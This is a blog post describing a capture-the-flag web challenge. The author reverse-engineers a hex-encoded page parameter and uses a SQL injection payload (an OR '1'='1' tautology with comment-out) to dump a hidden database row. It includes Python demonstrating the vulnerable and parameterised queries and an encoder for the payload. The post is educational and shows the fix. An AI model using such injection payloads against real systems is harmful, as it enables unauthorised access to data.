Daniel Bark


Published 2024-10-21 by Daniel Bark


Capture the flag - A Great Hobby for Developers

As developers, we’re constantly looking for ways to sharpen our skills and keep learning.

In my opinion, one of the most engaging and rewarding ways to do this is through Capture the Flag (CTF) competitions.

These events, which are designed to test problem-solving and security skills, offer a unique opportunity for developers to explore new techniques, tools, and approaches in a hands-on way.

I would like to showcase this by walking you through how I solved a really fun challenge recently.

The Task - “Target List”

The brief was short: “See if you can find any hidden targets in the target list”.

We land on a site with three links: A, B and C.

If we click on A we land on the same URL, but with a query parameter “page=1” appended.

The page displayed <h1>Page 01</h1> and <p>Targets starting with "A"</p>.

There is a table on the page listing 2 results: Alice and Amber.

There are no surprises on pages B and C:

query param   page title   starts with   results
page=2        Page 02      "B"           Bob
page=3        Page 03      "C"           Charlie

So my first instinct was to walk through the whole alphabet and see whether more data is reachable than the three linked pages A, B and C.

I edited the URL to page=4.

query param   page title   starts with   results
page=4        Page 04      "D"           No rows

Things get weird

We continue through empty pages until we reach page 10. I was expecting targets starting with the letter “J”, but things get a bit more confusing.

query param   page title   starts with   results
page=10       Page 010     "A@"          No rows
page=11       Page 011     "AA"          No rows
page=12       Page 012     "AB"          No rows

Hmm…What’s going on here?

I was stuck for quite a while figuring out how the page parameter, the page title and the target string related to each other.

Let's test some larger page numbers:

query param   page title   starts with
100           Page 0100    "A@"
101           Page 0101    "AA"
102           Page 0102    "AB"

Hmm, by this pattern it seems like the title is parsed in pairs of two digits? What if the second pair is 10? Will that give us the 10th letter of the alphabet, “J”?

query param   page title   starts with
110           Page 0110    "AP"

OK, so 10 gives “P”, which is the 16th letter of the alphabet. Or the 0x10th. You get where I'm going?

Going Hexadecimal

It appears as though the page title is parsed in pairs of hex digits, i.e. as hexadecimal bytes: 256 possible values, from 00 to ff.

hex   calculation   decimal   character
01    0 * 16 + 1    1         "A"
10    1 * 16 + 0    16        "P"

Finally things make sense again, but there is a second problem: the page title always starts with a “0”.

This limits which first characters we can produce:

hex   calculation   decimal   character
00    0 * 16 + 0    0         "@"
0f    0 * 16 + 15   15        "O"

Because of this we can only produce strings starting with “@” or “A” through “O”.

The Challenge

Now the challenge was quite clear: the hidden targets have a starting character outside this range.

We just need to produce a malicious string that tricks the system.

A reasonable guess is that my input gets baked into a SQL query in some way.

A query like this (with whichever quote character the application uses) could produce the results we are seeing:

SELECT * FROM targets WHERE
name LIKE '[user_provided_query]%'

For every character after the first one we have the full range of 256 byte values at our disposal.

Let's see how the system responds to string delimiter characters like ' and ".

query param   page title   starts with   results
162           Page 0162    A"            target failed

It turned out that if you pass a " the system fails in some way.

That is great news!

If we can break out of the string we can potentially inject SQL into the system.

If the application delimits the pattern with double quotes (which is what the failure on " suggests) and we inject A%" OR '1'='1'; -- , the query could become

SELECT * FROM targets WHERE
name LIKE "A%" OR '1'='1'; -- %"

The OR '1'='1' clause is logically equivalent to OR true, which matches every target in the database.

The -- comments out the rest of the original query (the trailing %") so that it does not cause a syntax error.
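To make the mechanics concrete, here is the same injection reproduced against an in-memory SQLite table, with the hardened (parameterised, wildcard-escaped) query beside it. This is an added example and not the challenge's code: the table rows are constructed, and the vulnerable query is only my guess at what the back end ran. The live challenge evidently quoted its pattern with double quotes; the example uses single quotes because SQLite's handling of double-quoted strings depends on how it was built, and the injection is identical with the quote character swapped.

```python
# Added example (not the challenge's code): the LIKE-prefix injection from the
# post, reproduced against an in-memory SQLite table, next to the hardened
# query. The table contents are constructed for this example, and the shape
# of the vulnerable query is a guess at the challenge's back end.
import sqlite3

SAMPLE_TARGETS = ["Alice", "Amber", "Bob", "Charlie", "zflag"]  # constructed


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE targets (name TEXT NOT NULL)")
    conn.executemany("INSERT INTO targets (name) VALUES (?)",
                     [(name,) for name in SAMPLE_TARGETS])
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, prefix: str) -> list:
    """The guessed challenge query: the decoded prefix is spliced into a quoted
    LIKE pattern by string formatting. The live challenge evidently quoted the
    pattern with double quotes (a lone " broke it); single quotes are used here
    because SQLite's treatment of double-quoted strings varies by build, and the
    injection is the same with the quote character swapped."""
    sql = f"SELECT name FROM targets WHERE name LIKE '{prefix}%'"
    return sorted(row[0] for row in conn.execute(sql))


def safe_lookup(conn: sqlite3.Connection, prefix: str) -> list:
    """Hardened form. The pattern is a bound parameter, so quote characters in
    it are data rather than syntax, and LIKE metacharacters are escaped so a
    caller cannot widen the match with % or _ either."""
    escaped = (prefix.replace("\\", "\\\\")
                     .replace("%", "\\%")
                     .replace("_", "\\_"))
    sql = "SELECT name FROM targets WHERE name LIKE ? ESCAPE '\\'"
    return sorted(row[0] for row in conn.execute(sql, (escaped + "%",)))


# The injected prefix. It closes the pattern, tacks on an always-true
# condition and comments out the application's own trailing %'. The trailing
# space is deliberate: MySQL only recognises -- as a comment when whitespace
# follows it, and it is harmless elsewhere.
INJECTION = "A%' OR '1'='1'; -- "


def demo() -> dict:
    """Run the honest prefix and the injected one through both queries."""
    conn = make_db()
    return {
        "honest":        vulnerable_lookup(conn, "A"),
        "injected":      vulnerable_lookup(conn, INJECTION),
        "safe_honest":   safe_lookup(conn, "A"),
        "safe_injected": safe_lookup(conn, INJECTION),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label:14} {rows}")
```

Running it, the vulnerable query returns two rows for the honest prefix "A" and all five rows (including the hidden zflag) for the injected one, while the parameterised query returns the same two rows for "A" and nothing at all for the injection, because the whole injected string is now just a very odd prefix to search for.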

I wrote a quick script so that I could type in my desired SQL injection string, and it spat out this abomination: page=1016562600F12606771677D6771677B606D6D60
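The script itself is not shown in the post, so the following is an added reconstruction (not the post's script, and not the challenge's code) of the encoder together with its decoder, covering both the parsing rules worked out in the Going Hexadecimal section and the payload generation above. Everything in it is inferred from the observed pairs rather than confirmed by the challenge: the server prepends "0" to the parameter, reads the result as hex byte pairs (a dangling final digit counting as its own byte, which is how page=10 yields "A@"), and turns each byte into a character by XOR with 0x40, the one simple rule that fits 01→A, 10→P, 00→@, 0f→O and 62→". Under those rules the payload above decodes to AA%" OR '1'='1'; -- (note the second A and the % ahead of the closing quote, and the trailing space), and the encoder reproduces the payload from that string.

```python
# Added example: encoder/decoder for the challenge's ?page= parameter,
# reconstructed from the observations in the post. None of this is the
# challenge's code; the rules below are inferred:
#   1. the server prepends "0" to the parameter (the title is always "Page 0<page>"),
#   2. the result is read left to right as hex byte pairs, a dangling final
#      digit counting as a byte of its own (page=10 -> "010" -> "A@"),
#   3. each byte becomes a character by XOR with 0x40, the one simple rule that
#      fits every observed pair (01->A, 10->P, 00->@, 0f->O, 62->").

CHAR_KEY = 0x40  # ord("@"); assumption, see rule 3


def decode_page(page: str) -> str:
    """Return the "Targets starting with" string the server derives from ?page=."""
    digits = "0" + page
    chunks = [digits[i:i + 2] for i in range(0, len(digits), 2)]
    return "".join(chr(int(chunk, 16) ^ CHAR_KEY) for chunk in chunks)


def encode_page(target: str) -> str:
    """Return the ?page= value whose decoding is `target`.

    The server supplies the leading "0", so the first byte is limited to
    0x00..0x0f: only "@" and "A".."O" are reachable as a first character.
    Every later character may be any of the 256 byte values.
    """
    out = []
    for index, char in enumerate(target):
        byte = ord(char) ^ CHAR_KEY
        if byte > 0xFF:
            raise ValueError(f"{char!r} is not a single byte")
        if index == 0 and byte > 0x0F:
            raise ValueError(f"{char!r} cannot be the first character")
        out.append(f"{byte:02X}")
    return "".join(out)[1:]  # drop the "0" the server will put back


def reachable_first_chars() -> str:
    """The only first characters an unmodified parameter can express."""
    return "".join(chr(b ^ CHAR_KEY) for b in range(0x10))


# The value the post sent, verbatim, for cross-checking the model.
POST_PAYLOAD = "1016562600F12606771677D6771677B606D6D60"


if __name__ == "__main__":
    for page in ("1", "10", "110", "162"):
        print(f"page={page:<4} -> {decode_page(page)!r}")
    print("reachable first chars:", reachable_first_chars())
    print("post payload decodes to:", repr(decode_page(POST_PAYLOAD)))
```

Two details worth noticing: the encoder refuses a first character outside "@".."O" instead of silently emitting a parameter the server would misread, which is exactly the constraint that forced the injection route, and the payload's leading "A" costs nothing because the LIKE pattern is abandoned the moment the closing quote lands.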

And amazingly the page responds with all targets in the Database 🎉

After a wild 4 hour ride the flag presented itself on a user with the name zflag.

The journey described here is why I think CTFs can be a great learning tool.

I enjoy the mix of problem solving, thinking outside the box and having to do lots of tools and technology research.

Try it out if you haven't, and see if you can muster the patience and resilience to experience the sweet relief of the flag.

Have a great day and good luck on your next CTF.
